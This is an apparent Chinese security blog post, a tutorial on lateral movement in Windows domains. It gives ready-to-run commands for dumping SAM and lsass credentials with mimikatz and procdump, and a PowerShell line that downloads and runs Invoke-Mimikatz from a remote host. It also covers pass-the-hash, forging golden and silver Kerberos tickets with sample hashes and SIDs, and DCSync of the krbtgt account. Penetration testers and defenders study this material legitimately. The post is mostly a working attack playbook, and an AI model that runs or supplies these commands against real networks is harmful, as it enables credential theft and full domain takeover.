<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    內網滲透之域內橫向移動

    VSole2021-10-31 15:51:58

    hash 介紹

    在域環境中,用戶信息存儲在域控的ntds.dit(C:\Windows\NTDS\NTDS.dit)中;

    非域環境也就是在工作組環境中,當前主機用戶的密碼信息存儲著在sam文件(C:\Windows\System32\config\SAM)。

    Windows操作系統通常使用兩種方法(LM和NTLM)對用戶的明文密碼進行加密處理。

    LM只能存儲小于等于14個字符的密碼hash

    如果密碼大于14個,windows就自動使用NTLM對其進行加密。

    LM Hash的全名為”LAN Manager Hash”,是微軟為了提高Windows操作系統的安全性而采用的散列值加密算法,XP、win2k和win2k3來說

    系統默認使用LM進行加密,個人版從Windows Vista 以后,服務器版從Windows Server 2003以后該方法被禁用。

    如果抓取的LM Hash值是”aad3b435b51404eeaad3b435b51404ee”

    可能的情況有:LM Hash值為空、密碼大于14位、被禁用或者認為設置。

    NTLM Hash是微軟為了在提高安全性的同時保證兼容性而設計的散列加密算法。

    NTLM Hash是基于MD4加密算法進行加密的。

    Windows操作系統的認證方式均為NTLM Hash。

    hash 獲取

    要在windows系統中抓取nt-hash或者明文,必須要system權限

    想要破解sam文件與ntds.dit文件都需要擁有一個system文件

    (C:\Windows\System32\config\SYSTEM)

    離線獲取

    導出 sam 和 system 文件

    reg save hklm\system  C:\Users\Administrator\Desktop\hash\system.hive
    reg save hklm\sam C:\Users\Administrator\Desktop\hash\sam.hive
    

    使用 mimikatz

    lsadump::sam /sam:C:\Users\Administrator\Desktop\hash\sam.hive /system:C:\Users\Administrator\Desktop\hash\system.hive
    

    mimikatz

    本地讀取

    將 mimikatz 傳到目標機器

    privilege::debugtoken::elevatelsadump::sam
    

    在線讀取

    mimikatz.exe privilege::debug sekurlsa::logonpasswords
    

    lsass.dmp

    使用 procdump 導出 了lsass.dmp 文件

    procdump.exe -accepteula -ma lsass.exe C:\Users\Administrator\Desktop\hash\lsass.dmp
    sekurlsa::minidump C:\Users\Administrator\Desktop\hash\lsass.dmp
    sekurlsa::logonpasswords full
    

    powershell

    遠程獲取

    powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
    

    hash 傳遞(pth,pass the hash)

    測試環境

    域:tisheng.test

    用戶名:administrator

    NTLM hash:3ec403e7aee6461f12e8f7b644410605

    用管理員權限運行

    mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:tisheng.test /ntlm:3ec403e7aee6461f12e8f7b644410605"
    

    成功后回彈出一個新的窗口

    票據傳遞(ptt,path the triket)

    票據傳遞攻擊(PtT)是一種使用Kerberos票據代替明文密碼或NTLM哈希的方法。

    PtT最常見的用途可能是使用黃金票據和白銀票據,通過PtT訪問主機相當簡單。

    黃金票據(tgt,Golden Ticket)

    金票是通過偽造的TGT(TicketGranting Ticket),金票就有了域內的最高權限。

    制作金票的條件
    1、域名稱            
    2、域的SID值
    3、域的KRBTGT賬戶密碼HASH (krbtgt 域賬戶的密碼基本不會更改,即使域管密碼被修改,它也不會改變)
    4、偽造用戶名,可以是任意的
    

    獲取數據

    mimikatz.exe "log" "privilege::debug" "lsadump::dcsync /domain:tisheng.test /user:krbtgt"
    

    生成金票

    方法1:

    生成金票

    kerberos::golden /admin:administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:golden.kiribi
    

    將金票導入內存

    kerberos::purge                  //清空內存中的票據kerberos::ppt golden.kiribi        //導入票據kerberos::list                    //查看票據
    

    方法2:

    kerberos::golden /user:要偽造的域用戶(我們這一般寫域管理員) /domain:域名 /sid:域的sid值 /krbtgt:krbtgt的哈希 /pttkerberos::golden /user:administrator /domain:tisheng.test /sid:S-1-5-21-74797282-3442809439-2700332097/krbtgt:070dac97f50c95d08e98be1578327e7b /ptt
    

    也可以使用 ase256 生成

    kerberos::golden /user:administrator /domain:tisheng.test /sid:S-1-5-21-74797282-3442809439-2700332097-502 /aes256:9dd45bd4b2c39a54240f5dc03bb4ecfb023285cf956425ba16f61db7ee48040d  /ptt
    

    方法3:

    在域控上執行

    mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
    

    將生成的文件保存下來

    mimikatz "privilege::debug"  "kerberos::ptt [0;b9476]-2-0-40e10000-Administrator@krbtgt-TISHENG.TEST.kirbi"
    

    白銀票據(st,SilverTickets)

    銀票只能訪問指定服務

    制作銀票的條件
    1.域名稱2.域的SID值3.域中的Server服務器賬戶的NTLM-Hash4.偽造的用戶名,可以是任意用戶名.5.目標服務器上面的kerberos服務
    服務名稱                    同時需要的服務WMI                        HOST、RPCSSPowerShell Remoting        HOST、HTTPWinRM                    HOST、HTTPScheduled Tasks            HOSTWindows File Share        CIFSLDAP                    LDAPWindows Remote Server    RPCSS、LDAP、CIFS
    

    生成白銀票據

    kerberos::golden /domain:tisheng.test /sid:S-1-5-21-74797282-3442809439-2700332097 /target:dc.tisheng.test /service:cifs /rc4:3ec403e7aee6461f12e8f7b644410605 /user:test /ptt
    

    kerberossystem
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Kerberos認證介紹Kerberos是一種計算機網絡授權協議,用來在非安全網絡中,對個人通信以安全的手段進行身份認證。這個詞又指麻省理工學院為這個協議開發的一套計算機軟件。而已有了金票后,就跳過AS驗證,不用驗證賬戶和密碼,所以也不擔心域管密碼修改。
    內網滲透TIPS總結
    2023-01-28 11:00:41
    內網基礎知識1、工作組:工作組是 局域網 中的一個概念,他是長久的資源管理模式。默認情況下使用工作組方式進行資源管理,將不同的 computer 按照不同的要求分類到不同的組。而實際上,因為域名的計算機是使用DNS 來定位域控制器、服務器及其他計算機、網絡服務的,所以域的名字就是DNS 域的名字。在內網滲透測試中,大都是通過尋找 DNS 服務器來確定域控制器的位置的。
    發現內網主機:10.10.10.2、10.10.10.4在meterpreter中輸入命令 shell 進入 成員服務器Winserver 2008-2 的命令行,使用命令查看網絡詳細情況meterpreter > shell. 通過這些信息可以判斷 成員服務器Winserver 2008-2 在 ocean.com 域中,根據 DNS 信息判斷域控主機 IP 為10.10.10.2設置路由使用 Nmap 對內網主機進行掃描meterpreter > background. msf5 exploit > route add 10.10.10.3 255.255.255.0 1. # 將被控機成員服務器Winserver 2008-2的IP添加到 MSF 中,這是給kali增加的路由,添加之后kali才才能找到內網主機
    "Potato"的早期利用技術幾乎完全相同:利用 COM 接口的某些特性,欺騙 NT AUTHORITY\SYSTEM 賬戶連接并驗證攻擊者控制的 RPC 服務器。最后,該令牌被竊取,然后使用 CreateProcessWithToken() 或 CreateProcessAsUser() 函數傳遞令牌并創建一個新進程以獲取 SYSTEM 權限。在 Windows 域環境中,加入域的系統計算機帳戶使用 SYSTEM、NT AUTHORITY\NETWORK SERVICE 和 Microsoft 虛擬帳戶進行身份驗證。
    S4UTomato是一款功能強大的權限提升工具,該工具專為藍隊研究人員設計,可以通過Kerberos將服務賬號(Service Account)權限提升為LocalSystem。
    kerberos協議從0到1
    2021-10-12 14:26:38
    krbtgt用戶,是系統在創建域時自動生成的一個帳號,其作用是密鑰分發中心的服務賬號,其密碼是系統隨機生成的,無法登錄主機
    kerberos委派詳解
    2021-10-08 14:49:15
    委派域委派是指,將域內用戶的權限委派給服務賬號,使得服務賬號能以用戶權限開展域內活動。服務賬號,域內用戶的一種類型,服務器運行服務時所用的賬號,將服務運行起來并加入域。例如MSSQL Server在安裝時,會在域內自動注冊服務賬號'SqlServiceAccount',這類賬號不能用于交互式登錄。
    本文是很久之前做的筆記,今天有空又梳理了一下,分享出來。如果有錯誤或疏漏,歡迎留言指出。 Kerberos是一種基于票據的、集中式的網絡認證協議,適用于C/S模型,由MIT開發和實現(http://web.mit.edu/kerberos/dist/)。 這里所謂的認證,就是保證使用票據(Ticket)的用戶必須是票據中指定的用戶。 簡單回憶一下,密碼學涉及機密性、完整性、認證性(實體認證+
    本文主要記錄了如何通過一些列操作,將生成的keytab導入wireshark,實現可以在wireshark中直接對Kerberos協議加密部分進行解密的一個過程,避免大家踩坑。
    域滲透重要漏洞匯總
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类